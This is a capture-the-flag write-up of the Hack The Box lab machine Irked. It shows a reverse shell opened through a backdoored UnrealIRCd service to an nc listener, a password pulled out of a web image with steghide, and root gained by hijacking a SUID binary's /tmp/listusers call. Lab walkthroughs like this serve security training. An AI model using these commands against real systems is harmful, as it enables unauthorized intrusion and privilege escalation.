Hack The Box - Irked (Without Metasploit)

Posted Jan 21, 2021 Updated Oct 4, 2023

By rizemon 7 min read

Configuration

The operating system that I will be using to tackle this machine is a Kali Linux VM.

What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts.

  
$ echo "10.10.10.117 irked.htb" | sudo tee -a /etc/hosts 

Reconnaissance

  
rustscan --accessible -a irked.htb -r 1-65535 -- -sT -sV -sC -Pn
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.117:22
Open 10.10.10.117:80
Open 10.10.10.117:111
Open 10.10.10.117:6697
Open 10.10.10.117:8067
Open 10.10.10.117:41521
Open 10.10.10.117:65534
Starting Script(s)
Script to be run Some("nmap -vvv -p  ")

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-20 12:17 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating Connect Scan at 12:17
Scanning irked.htb (10.10.10.117) [7 ports]
Discovered open port 111/tcp on 10.10.10.117
Discovered open port 22/tcp on 10.10.10.117
Discovered open port 80/tcp on 10.10.10.117
Discovered open port 65534/tcp on 10.10.10.117
Discovered open port 6697/tcp on 10.10.10.117
Discovered open port 41521/tcp on 10.10.10.117
Discovered open port 8067/tcp on 10.10.10.117
Completed Connect Scan at 12:17, 0.01s elapsed (7 total ports)
Initiating Service scan at 12:17
Scanning 7 services on irked.htb (10.10.10.117)
Completed Service scan at 12:17, 11.06s elapsed (7 services on 1 host)
NSE: Script scanning 10.10.10.117.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.64s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
NSE Timing: About 98.33% done; ETC: 12:18 (0:00:01 remaining)
Completed NSE at 12:18, 60.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:18
Completed NSE at 12:18, 0.00s elapsed
Nmap scan report for irked.htb (10.10.10.117)
Host is up, received user-set (0.0067s latency).
Scanned at 2021-01-20 12:17:47 UTC for 72s

PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAI+wKAAyWgx/P7Pe78y6/80XVTd6QEv6t5ZIpdzKvS8qbkChLB7LC+/HVuxLshOUtac4oHr/IF9YBytBoaAte87fxF45o3HS9MflMA4511KTeNwc5QuhdHzqXX9ne0ypBAgFKECBUJqJ23Lp2S9KuYEYLzUhSdUEYqiZlcc65NspAAAAFQDwgf5Wh8QRu3zSvOIXTk+5g0eTKQAAAIBQuTzKnX3nNfflt++gnjAJ/dIRXW/KMPTNOSo730gLxMWVeId3geXDkiNCD/zo5XgMIQAWDXS+0t0hlsH1BfrDzeEbGSgYNpXoz42RSHKtx7pYLG/hbUr4836olHrxLkjXCFuYFo9fCDs2/QsAeuhCPgEDjLXItW9ibfFqLxyP2QAAAIAE5MCdrGmT8huPIxPI+bQWeQyKQI/lH32FDZb4xJBPrrqlk9wKWOa1fU2JZM0nrOkdnCPIjLeq9+Db5WyZU2u3rdU8aWLZy8zF9mXZxuW/T3yXAV5whYa4QwqaVaiEzjcgRouex0ev/u+y5vlIf4/SfAsiFQPzYKomDiBtByS9XA==
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDGASnp9kH4PwWZHx/V3aJjxLzjpiqc2FOyppTFp7/JFKcB9otDhh5kWgSrVDVijdsK95KcsEKC/R+HJ9/P0KPdf4hDvjJXB1H3Th5/83gy/TEJTDJG16zXtyR9lPdBYg4n5hhfFWO1PxM9m41XlEuNgiSYOr+uuEeLxzJb6ccq0VMnSvBd88FGnwpEoH1JYZyyTnnbwtBrXSz1tR5ZocJXU4DmI9pzTNkGFT+Q/K6V/sdF73KmMecatgcprIENgmVSaiKh9mb+4vEfWLIe0yZ97c2EdzF5255BalP3xHFAY0jROiBnUDSDlxyWMIcSymZPuE1N6Tu8nQ/pXxKvUar
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFeZigS1PimiXXJSqDy2KTT4UEEphoLAk8/ftEXUq0ihDOFDrpgT0Y4vYgYPXboLlPBKBc0nVBmKD+6pvSwIEy8=
|   256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6m+0iYo68rwVQDYDejkVvsvg22D8MN+bNWMUEOWrhj
80/tcp    open  http    syn-ack Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35316/tcp6  status
|   100024  1          41521/tcp   status
|   100024  1          53146/udp   status
|_  100024  1          56568/udp6  status
6697/tcp  open  irc     syn-ack UnrealIRCd
8067/tcp  open  irc     syn-ack UnrealIRCd
41521/tcp open  status  syn-ack 1 (RPC #100024)
65534/tcp open  irc     syn-ack UnrealIRCd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:18
Completed NSE at 12:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:18
Completed NSE at 12:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:18
Completed NSE at 12:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.29 seconds

Enumeration (1)

Port 80 `Apache httpd 2.4.10 ((Debian))`

The message at the bottom right might perhaps be referring to the IRC service that found via nmap.

Port 6697 `UnrealIRCd`

Using a nmap script, we see that this unrealircd has a backdoor.

  
$ nmap -sV --script=irc-unrealircd-backdoor -p 6697 irked.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-20 07:21 EST
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.0095s latency).

PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds

Exploitation (1)

Using this script, I was able to make use of the backdoor and spawn a shell.

$ python3 exploit.py -payload python irked.htb 6697
Exploit sent successfully!

After a while, on our nc listener that we setup beforehand, we see that we get a shell as ircd.

  
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.117] 45622
id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
ircd@irked:~/Unreal3.2$

Enumeration (2)

In the home directory of another user djmardov, apart from the user.txt that we have no access to, there was a file called .backup.

ircd@irked:~/Unreal3.2$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

I tried logging in with UPupDOWNdownLRlrBAbaSSss, but unfortunately it was the wrong password. The file said something about steg, as in steganography? Perhaps the image we saw on the web server is hiding something?

After installing steghide, I used it to check if there is anything hidden in the image.

  
$ steghide info irked.jpg 
"irked.jpg":
  format: jpeg
  capacity: 1.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "pass.txt":
    size: 17.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

It tells us that there is a file called pass.txt! Lets extract it.

  
$ steghide extract -sf irked.jpg
Enter passphrase: 
wrote extracted data to "pass.txt"

$ cat pass.txt
Kab6h+m+bbp2J:HG

Could this be the password?

  
ircd@irked:~/Unreal3.2$ su djmardov
Kab6h+m+bbp2J:HG

djmardov@irked:~/Documents$ id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

We managed to login as djmardov.

user.txt

The user flag is in djmardov’s Documents directory.

djmardov@irked:~/Documents$ cat user.txt
4a66XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Enumeration (3)

Using linux-smart-enumeration, we see that there is a SUID binary viewuser that stood out.

  
djmardov@irked:/tmp$ ./lse.sh
...
[*] fst010 Binaries with setuid bit........................................ yes!                                   
[!] fst020 Uncommon setuid binaries........................................ yes!                                   
---
/usr/bin/X
/usr/bin/viewuser
...

Upon running viewuser, we see that it is looking for a file called /tmp/listusers but it doesn’t exist. Could it perhaps be trying to execute it?

  
djmardov@irked:/tmp$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-20 08:03 (:0)
sh: 1: /tmp/listusers: not found

Exploitation (2)

Lets create /tmp/listusers that will contain the /bin/bash command.

  
djmardov@irked:/tmp$ echo "/bin/bash" > /tmp/listusers
djmardov@irked:/tmp$ chmod +x /tmp/listusers

And then we run /tmp/listusers.

  
djmardov@irked:/tmp$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-20 08:03 (:0)
root@irked:/tmp# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

We managed to get a shell as root!

root.txt

The root flag is in root’s home directory.

root@irked:/tmp# cat /root/root.txt
8d8eXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Rooted ! Thank you for reading and look forward for more writeups and articles !

hackthebox

This post is licensed under CC BY 4.0 by the author.